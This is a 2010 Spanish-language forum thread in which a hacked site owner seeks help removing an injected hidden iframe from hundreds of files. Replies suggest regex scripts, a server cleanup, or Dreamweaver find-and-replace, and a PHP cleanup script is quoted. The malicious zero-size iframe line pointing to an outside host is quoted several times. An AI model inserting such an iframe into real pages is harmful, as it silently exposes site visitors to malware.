Problema con Iframe Maliciosos!

pepe12124 · #1 (**permalink**) 08/05/2010, 14:25

Hola fui atacado en mi hosting y todos los files index. php, html htm etc... fueron modificados y le agregaron la linea:

?><iframe src="http://2zy6ya5t.skottles.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Al final con siempre una modificacion donde dice: 2zy6ya5t.skottles.com siempre modifican el subdominio por xxxxxxxx cualquier cosa distinta, lo que necesito seria ejecutar algun php para que revise todos mis files o mis index y elimine esa linea completamente porque si lo hago a mano tengo unos 400 files por modificar...

Si alguien me puede ayudar muchas Gracias!

pateketrueke · #2 (**permalink**) 08/05/2010, 16:28

puedes hacer un script para iterar los directorios recursivamente, y que con expresiones regulares reemplace dichos contenidos... ;)

por favor, investiga por los términos...

chichote · #3 (**permalink**) 08/05/2010, 21:20

mmm yo creo que no es la idea estar creando script para eliminar los codigos que se agreguen por un virus, la solucion seria limpiar el servidor y arreglar las vulnerabilidades, puede que ahora lo arregles, pero en una semana mas quizas sea otro virus.

saludos.

iovan · #4 (**permalink**) 08/05/2010, 23:07

Si es un servidor gratuito nimodo. Tienes que acatarte a las reglas. Si no te gusta la publicidad contrata un plan.

Lo de usar expresiones regulares para buscar la cadena de texto y remplazarla esta bien.
Pero te espera mucho trabajo.

saludos.

pepe12124 · #5 (**permalink**) 09/05/2010, 09:17

Hola, como estan? muchas Gracias por sus respuestas, es un servidor pago, el "Virus" ingreso aparentemente por un Bug del filezilla, ya pase un Spyware antivirus, etc en mi pc cambie pass tanto del cpanel y de los FTP, entonces ya no me han cambiado mas los files desde hace 2 o 3 dias, pero lo que ando necesitando por eso los molesto.... es algun script php para buscar esto:

Cita:

?><iframe src="http://2zy6ya5t.skottles.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

En todos los index.html .php. xml .htm

Quisiera saber si alguien me puede tirar algun codigo o scipt que me pueda ayudar, porque tengo en total unos 200 250 archivos index...

Muchas Gracias por sus respuesas e interes!

millan2525 · #6 (**permalink**) 10/05/2010, 07:04

Si fue un bug del filezilla y te atacó el servidor, pero no es una vulneribilidad de tu web, te recomiendo que subas de nuevo tus archivos.

Lo malo es si no tienes todo en la bbdd y tienes datos guardados en .txt o .php cambios que hagas a la web.

Si no, mira a ver si tienes algún backup

chichote · #7 (**permalink**) 10/05/2010, 10:23

Si es de pago no es problema tuyo, es problema del proveedor de hosting, ellos tienen q solucionarte el problema, puede que todo el equipo este contaminado.

Ellos son los responsables de darte seguridad, de hecho ese virus ni siquiera debio entrar al server, es decir no te estan ofreciendo un servicio adecuado.

Veo dos soluciones, tu proveedor arregla el problema limpiando sus servers y ampliando los niveles de seguridad, o lo otro es q te cambies de hosting.

saludos

pepe12124 · #8 (**permalink**) 10/05/2010, 11:16

Gracias por sus consejos, pero alguien tiene algun codigo php o script que analize mis files uno por uno y borre esas lineas?

Gracias!

LuZBinG · #9 (**permalink**) 10/05/2010, 11:36

hola buen dia
lo que te paso es un " virus iframe" es codigo malicioso en la web en el iframe que redirecciona al usuario a una web con virus o troyanos etc..

no importa si borras el contenido de tus archivos index etcc.... el virus o codigo volverá aparecer.

el problema en con tu pc que es la que esta infectada. hay antivirus que no detectan este tipo de virus.

trata con hijackthis

ahora para buscar el contenido

?><iframe src="http://2zy6ya5t.skottles.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

en todos tus archivo puedes utilizar dreamweaver la opcion buscar y reemplazar

salu2

pepe12124 · #10 (**permalink**) 10/05/2010, 11:42

LuZBinG, gracias por tu respuesta, mi pc ya la limpie, el problema no vuelve a suceder porque en algunos files ya borre el iframe y no volvio a aparecer, lo que pasa es que tengo unos 200 index mas que limpiar, pero si lo hago a mano puedo estar unos 20 dias para hacerlo... Yo lo que necesito es algun codigo o script para ejecutar desde el servidor para que revise estos files y si encuentra la linea del iframe la borre!

Encontre este codigo en internet, pero no se como editarlo para buscar el iframe que quiero borrar!

Cita:

<?php
ob_implicit_flush();
set_time_limit(0);
//En la siguiente l�nea, $base, debe especificar la carpeta que desea analizar.
// En este caso va a analizar la carpeta vhosts que es donde tenemos nuestros sitios.
//Estas carpetas cambian dependiendo de la configuraci�n del hosting.
$base = "/var/www/vhosts/";

$omitir = array(
"Reemplazar.php",
);

echo "<pre>";
$totalencontrados = 0;
LeerDir("", 1, $totalencontrados, $total8080);
echo "\n\nTOTAL ENCONTRADOS: $totalencontrados ($total8080)\n";

echo "</pre>";

function LeerDir($directorio_actual, $nivel, &$totalencontrados, &$total8080)
{
global $omitir, $base;

$dh = opendir($base."/".$directorio_actual);

while (($file = readdir($dh)) != false)
{
if($file != "." && $file != ".." && $file != "" && !in_array($base."/".$directorio_actual."/".$file, $omitir))
{
if(is_dir($base."/".$directorio_actual."/".$file))
{
#Crear el directorio si no existe en destino
$destino_actual = $directorio_actual."/".$file;

echo "<b>$file</b>\n";
#Leer recursivamente el Directorio
LeerDir("$destino_actual", $nivel+1, $totalencontrados, $total8080);
}
else
{
if(ereg(".php|.html|.htm|.js|.inc|.xml", $file))
{
ReemplazarEnArchivo($base."".$directorio_actual."/".$file, $totalencontrados, $total8080);
}
}

}

}

}

function ReemplazarEnArchivo($archivo, &$totalencontrados, &$total8080)
{
$contenido = file_get_contents($archivo);

if(!$contenido)
{
echo "Archivo no leido ... $archivo \n";
return;
}

ereg(":8080", $contenido, $coincidencias);
if(is_array($coincidencias))
$total8080 += count($coincidencias);

$patrones = array(

5 => '#<iframe src=(.*) style="visibility: hidden"></iframe>#',
);

$cantidad = 0;
foreach($patrones as $patron)
{
$actual = 0;
ereg($patron, $contenido, $coincidencias);
$actual = @count($coincidencias);
$contenido = preg_replace($patron, "", $contenido);
$cantidad += $actual;
}

$totalencontrados += $cantidad;

if($cantidad>0)
{
if (is_writable($archivo))
{
if (!$handle = fopen($archivo, 'w+'))
{
echo "No se puede escribir en el archivo ($archivo)\n";
exit;
}

if (fwrite($handle, $contenido) === FALSE)
{
echo "No se puede escribir en el archivo ($archivo)\n";
exit;
}

echo "Procesado ($archivo)...$cantidad ocurrencias\n";
fclose($handle);

}
else
{
echo "$archivo Archivo no escribible ..\n";
}
}
else
{
echo "$archivo No encontradas coincidencias... \n";
}
}
?>

Alguien sabe como editarlo?

Gracias!

LuZBinG · #11 (**permalink**) 10/05/2010, 12:32

trata como te dije con dreamweaver solo tendrias que bajar los archivos
una posible solucion

pepe12124 · #12 (**permalink**) 10/05/2010, 12:39

De esa manera los edito desde el server es mejor...

LuZBinG · #13 (**permalink**) 10/05/2010, 12:44

y pudiste modificar o adaptar el script?

LuZBinG · #14 (**permalink**) 10/05/2010, 13:05

perdona si sigo insistiendo pero con dreamweaver (no es publicidad) te puedes conectar al ftp y editar.... hacer un buscar y reemplazar en todo el sitio.

chichote · #15 (**permalink**) 10/05/2010, 13:13

Cita:

Iniciado por LuZBinG

trata como te dije con dreamweaver solo tendrias que bajar los archivos
una posible solucion

Concuerdo con LuzBinG, con dreamweaver te tomaria 10 segundos, puedes recorrer una carpeta buscando y remplazando automaticamante, dremweaver trae esa opcion.

Saludos.